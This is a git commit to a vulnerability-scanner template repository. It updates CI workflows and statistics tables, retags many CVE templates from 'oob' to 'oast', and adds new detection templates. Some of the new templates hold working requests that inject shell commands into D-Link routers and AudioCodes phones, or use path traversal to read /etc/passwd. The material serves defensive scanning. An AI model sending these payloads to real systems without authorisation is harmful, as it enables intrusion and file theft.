commit
cd174d96fa
|
@ -23,11 +23,11 @@ jobs:
|
|||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
nuclei -validate -t .
|
||||
# nuclei -validate -w ./workflows # Disabling temporarily
|
||||
nuclei -validate -w ./workflows
|
||||
shell: bash
|
|
@ -2,14 +2,12 @@ name: 🗒 Templates Stats
|
|||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
if: ${{ startsWith(github.ref, 'refs/tags/v') }}
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
|
|
20
README.md
20
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
|
||||
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
|
||||
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
|
||||
| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 |
|
||||
| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 |
|
||||
| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 |
|
||||
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
|
||||
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
|
||||
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
|
||||
| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | |
|
||||
| rce | 214 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 165 | madrobot | 63 | file | 50 | | | | |
|
||||
|
||||
**175 directories, 2366 files**.
|
||||
**176 directories, 2382 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
1801
TEMPLATES-STATS.md
1801
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
18
TOP-10.md
18
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
|
||||
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
|
||||
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
|
||||
| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 |
|
||||
| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 |
|
||||
| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 |
|
||||
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
|
||||
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
|
||||
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
|
||||
| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | |
|
||||
| rce | 214 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 165 | madrobot | 63 | file | 50 | | | | |
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Weblogic SSRF in SearchPublicRegistries.jsp
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
tags: cve,cve2014,weblogic,oracle,ssrf,oob
|
||||
tags: cve,cve2014,weblogic,oracle,ssrf,oast
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
||||
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
|
||||
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
|
||||
tags: cve,cve2015,websphere,deserialization,rce,oob
|
||||
tags: cve,cve2015,websphere,deserialization,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
|
||||
tags: cve,cve2015,ssrf,oob
|
||||
tags: cve,cve2015,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
|
||||
cvss-score: 8.20
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
|
||||
tags: cve,cve2017,rce,oracle,weblogic,oob
|
||||
tags: cve,cve2017,rce,oracle,weblogic,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.50
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Apache Solr <= 7.1 XML entity injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2017,solr,apache,oob,xxe
|
||||
tags: cve,cve2017,solr,apache,oast,xxe
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
||||
- https://twitter.com/honoki/status/1298636315613974532
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://github.com/graphite-project/graphite-web/issues/2008
|
||||
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
|
||||
tags: cve,cve2017,graphite,ssrf,oob
|
||||
tags: cve,cve2017,graphite,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pdteam
|
||||
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
severity: high
|
||||
tags: cve,cve2017,weblogic,oracle,rce,oob
|
||||
tags: cve,cve2017,weblogic,oracle,rce,oast
|
||||
reference:
|
||||
- https://hackerone.com/reports/810778
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
|
||||
- https://ecosystem.atlassian.net/browse/OAUTH-344
|
||||
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
|
||||
tags: cve,cve2017,atlassian,jira,ssrf,oob
|
||||
tags: cve,cve2017,atlassian,jira,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: cve,cve2018,jenkins,ssrf,oob
|
||||
tags: cve,cve2018,jenkins,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-10093
|
||||
|
||||
info:
|
||||
name: AudioCode 400HD - RCE
|
||||
author: wisnupramoedya
|
||||
severity: high
|
||||
description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/46164
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10093
|
||||
tags: cve,cve2018,rce,iot
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2018-10093
|
||||
cwe-id: CWE-862
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/command.cgi?cat%20/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "admin:.*:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
tags: cve,cve2018,lg-nas,rce,oob
|
||||
tags: cve,cve2018,lg-nas,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-10823
|
||||
|
||||
info:
|
||||
name: D-Link Routers - Command Injection
|
||||
author: wisnupramoedya
|
||||
severity: high
|
||||
description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45676
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10823
|
||||
tags: cve,cve2018,rce,iot,dlink,router
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2018-10823
|
||||
cwe-id: CWE-78
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-12054
|
||||
|
||||
info:
|
||||
name: Schools Alert Management Script - Arbitrary File Read
|
||||
author: wisnupramoedya
|
||||
severity: high
|
||||
description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44874
|
||||
- https://www.cvedetails.com/cve/CVE-2018-12054
|
||||
tags: cve,cve2018,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2018-12054
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/img.php?f=/./etc/./passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-13980
|
||||
|
||||
info:
|
||||
name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure
|
||||
author: wisnupramoedya
|
||||
severity: medium
|
||||
description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45016
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-13980
|
||||
tags: cve,cve2018,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.50
|
||||
cve-id: CVE-2018-13980
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,7 +7,7 @@ info:
|
|||
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||
author: gy741
|
||||
severity: high
|
||||
tags: cve,cve2018,dlink,ssrf,oob
|
||||
tags: cve,cve2018,dlink,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
|
||||
cvss-score: 8.60
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/49918
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
|
||||
tags: cve,cve2018,logontracer,rce,oob
|
||||
tags: cve,cve2018,logontracer,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
||||
- https://paper.seebug.org/1009/
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
tags: cve,cve2019,apache,rce,solr,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: pikpikcu,madrobot
|
||||
severity: high
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
tags: cve,cve2019,apache,rce,solr,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.50
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
- https://github.com/igniterealtime/Openfire/pull/1497
|
||||
tags: cve,cve2019,ssrf,openfire,oob
|
||||
tags: cve,cve2019,ssrf,openfire,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616
|
||||
- https://www.exploit-db.com/exploits/46729
|
||||
tags: cve,cve2019,oracle,xxe,oob
|
||||
tags: cve,cve2019,oracle,xxe,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
||||
- https://www.exploit-db.com/exploits/46729
|
||||
tags: cve,cve2019,oracle,xxe,oob
|
||||
tags: cve,cve2019,oracle,xxe,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
- https://jira.atlassian.com/browse/JRASERVER-69793
|
||||
- https://hackerone.com/reports/713900
|
||||
tags: cve,cve2019,atlassian,jira,ssrf,oob
|
||||
tags: cve,cve2019,atlassian,jira,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
||||
cvss-score: 6.50
|
||||
|
|
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 5.30
|
||||
cve-id: CVE-2020-10770
|
||||
cwe-id: CWE-601
|
||||
tags: keycloak,ssrf,oob,cve,cve2020
|
||||
tags: keycloak,ssrf,oast,cve,cve2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
|
||||
reference:
|
||||
- https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
|
||||
tags: cve,cve2020,wavlink,rce,oob
|
||||
tags: cve,cve2020,wavlink,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
|
||||
reference:
|
||||
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
|
||||
tags: cve,cve2020,sophos,rce,oob
|
||||
tags: cve,cve2020,sophos,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
|
||||
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||
tags: cve,cve2020,dlink,rce,oob
|
||||
tags: cve,cve2020,dlink,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
|
||||
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||
tags: cve,cve2020,netgear,rce,oob
|
||||
tags: cve,cve2020,netgear,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
|
||||
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
|
||||
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
|
||||
tags: cve,cve2020,terramaster,rce,oob
|
||||
tags: cve,cve2020,terramaster,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
|
||||
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
|
||||
- https://www.exploit-db.com/exploits/48980
|
||||
tags: cve,cve2020,monitorr,rce,oob
|
||||
tags: cve,cve2020,monitorr,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/49189
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
|
||||
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
|
||||
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
|
||||
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
|
||||
tags: cve,cve2020,linksys,rce,oob,router
|
||||
tags: cve,cve2020,linksys,rce,oast,router
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
|
||||
tags: cve,cve2020,sap,ssrf,oob
|
||||
tags: cve,cve2020,sap,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: princechaddha
|
||||
severity: critical
|
||||
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
|
||||
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
|
||||
reference:
|
||||
- https://www.adminxe.com/2183.html
|
||||
tags: cve,cve2020,zimbra,ssrf,oob
|
||||
tags: cve,cve2020,zimbra,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
|
||||
reference:
|
||||
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
||||
tags: cve,cve2020,cacti,rce,oob
|
||||
tags: cve,cve2020,cacti,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1390300625129201664
|
||||
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
|
||||
tags: cve,cve2021,cisco,rce,oob
|
||||
tags: cve,cve2021,cisco,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1390300625129201664
|
||||
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
|
||||
tags: cve,cve2021,cisco,rce,oob
|
||||
tags: cve,cve2021,cisco,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-20031
|
||||
|
||||
info:
|
||||
name: Sonicwall SonicOS 7.0 - Host Header Injection
|
||||
author: gy741
|
||||
severity: low
|
||||
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50414
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
|
||||
metadata:
|
||||
google-dork: inurl:"auth.html" intitle:"SonicWall"
|
||||
tags: cve,cve2021,sonicwall,redirect
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{randstr}}.tld
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'https://{{randstr}}.tld/auth.html'
|
||||
- 'Please be patient as you are being re-directed'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
|
||||
- https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
|
||||
tags: cve,cve2021,minio,ssrf,oob
|
||||
tags: cve,cve2021,minio,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.70
|
||||
|
|
|
